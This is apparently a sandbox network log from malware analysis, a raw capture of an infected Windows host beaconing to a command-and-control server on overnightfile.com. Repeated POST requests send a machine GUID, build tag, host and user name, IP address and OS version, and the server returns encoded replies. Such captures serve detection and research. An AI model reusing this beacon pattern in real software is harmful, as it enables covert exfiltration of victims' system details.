                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:34.623135090 CEST517INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:34 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 33 38 34 0d 0a 43 46 55 58 41 52 5a 41 45 67 34 4f 43 67 6c 41 56 56 55 62 47 52 6b 66 43 52 55 66 48 67 38 5a 47 77 34 54 44 42 56 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 77 59 53 44 67 34 4b 51 46 56 56 48 68 4d 66 46 42 51 62 46 42 30 57 44 78 55 55 48 52 63 62 44 67 34 49 46 52 4d 4f 45 78 51 55 45 68 4d 66 46 31 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 4c 42 68 49 4f 44 67 70 41 56 56 55 62 44 77 34 56 43 68 4d 57 46 51 34 4a 47 78 59 66 43 56 51 54 46 46 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 6f 57 44 78 30 54 46 41 6c 56 53 77 59 53 44 67 34 4b 43 55 42 56 56 51 6b 53 48 77 67 65 46 51 67 55 41 78 6c 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 77 63 42 47 45 41 53 44 67 34 4b 43 55 42 56 56 52 73 5a 47 52 38 4a 46 52 38 65 44 78 6b 62 44 68 4d 4d 46 56 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 49 42 68 49 4f 44 67 70 41 56 56 55 65 45 78 38 55 46 42 73 55 48 52 59 50 46 52 51 64 46 78 73 4f 44 67 67 56 45 77 34 54 46 42 51 53 45 78 38 58 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 67 47 45 67 34 4f 43 6b 42 56 56 52 73 50 44 68 55 4b 45 78 59 56 44 67 6b 62 46 68 38 4a 56 42 4d 55 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 43 68 59 50 48 52 4d 55 43 56 56 49 42 68 49 4f 44 67 6f 4a 51 46 56 56 43 52 49 66 43 42 34 56 43 42 51 44 47 56 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 49 42 77 45 49 51 42 49 4f 44 67 6f 4a 51 46 56 56 47 78 6b 5a 48 77 6b 56 48 78 34 50 47 52 73 4f 45 77 77 56 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 6b 47 45 67 34 4f 43 6b 42 56 56 52 34 54 48 78 51 55 47 78 51 64 46 67 38 56 46 42 30 58 47 77 34 4f 43 42 55 54 44 68 4d 55 46 42 49 54 48 78 64 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 51 59 53 44 67 34 4b 51 46 56 56 47 77 38 4f 46 51 6f 54 46 68 55 4f 43 52 73 57 48 77 6c 55 45 78 52 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4b 46 67 38 64 45 78 51 4a 56 55 6b 47 45 67 34 4f 43 67 6c 41 56 56 55 4a 45 68 38 49 48 68 55 49 46 41 4d 5a 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 6b 48 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 384CFUXARZAEg4OCglAVVUbGRkfCRUfHg8ZGw4TDBVUGRUXVQ0KVxkVFA4fFA5VDhIfFx8JVRwPDg8IExVVSwYSDg4KQFVVHhMfFBQbFB0WDxUUHRcbDg4IFRMOExQUEhMfF1QZFRdVDQpXGRUUDh8UDlUOEh8XHwlVHA8ODwgTFVVLBhIODgpAVVUbDw4VChMWFQ4JGxYfCVQTFFUNClcZFRQOHxQOVQoWDx0TFAlVSwYSDg4KCUBVVQkSHwgeFQgUAxlUGRUXVQ0KVxkVFA4fFA5VDhIfFx8JVRwPDg8IExVVSwcBGEASDg4KCUBVVRsZGR8JFR8eDxkbDhMMFVQZFRdVDQpXGRUUDh8UDlUOEh8XHwlVHA8ODwgTFVVIBhIODgpAVVUeEx8UFBsUHRYPFRQdFxsODggVEw4TFBQSEx8XVBkVF1UNClcZFRQOHxQOVQ4SHxcfCVUcDw4PCBMVVUgGEg4OCkBVVRsPDhUKExYVDgkbFh8JVBMUVQ0KVxkVFA4fFA5VChYPHRMUCVVIBhIODgoJQFVVCRIfCB4VCBQDGVQZFRdVDQpXGRUUDh8UDlUOEh8XHwlVHA8ODwgTFVVIBwEIQBIODgoJQFVVGxkZHwkVHx4PGRsOEwwVVBkVF1UNClcZFRQOHxQOVQ4SHxcfCVUcDw4PCBMVVUkGEg4OCkBVVR4THxQUGxQdFg8VFB0XGw4OCBUTDhMUFBITHxdUGRUXVQ0KVxkVFA4fFA5VDhIfFx8JVRwPDg8IExVVSQYSDg4KQFVVGw8OFQoTFhUOCRsWHwlUExRVDQpXGRUUDh8UDlUKFg8dExQJVUkGEg4OCglAVVUJEh8IHhUIFAMZVBkVF1UNClcZFRQOHxQOVQ4SHxcfCVUcDw4PCBMVVUkH0
                                                                                                                                      Jul 14, 2020 11:20:46.780814886 CEST734OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:46.872651100 CEST734INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:46 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKZAPARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:47.414891005 CEST735OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:47.503587008 CEST735INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQKPJARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:48.780544043 CEST737OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:48.869982958 CEST737INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 43 58 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBCXYARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:50.487967968 CEST738OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:50.576773882 CEST738INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZVEAARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:51.071022987 CEST739OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:51.159069061 CEST739INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVKPEARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:51.771171093 CEST740OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:51.864172935 CEST740INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFGTUARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:52.231311083 CEST740OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:52.319689035 CEST741INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCMNXARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:52.748272896 CEST741OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:52.841948986 CEST741INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 4e 4d 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cANMZARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:53.165904999 CEST742OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:53.257359028 CEST742INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJJQQARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:53.590437889 CEST743OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:53.680881023 CEST748INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 56 45 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHVESARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.015072107 CEST766OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.102811098 CEST766INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.420243979 CEST767OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.508830070 CEST767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYBYBARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.879888058 CEST772OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.967772961 CEST775INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJYBQARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:55.323348045 CEST780OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
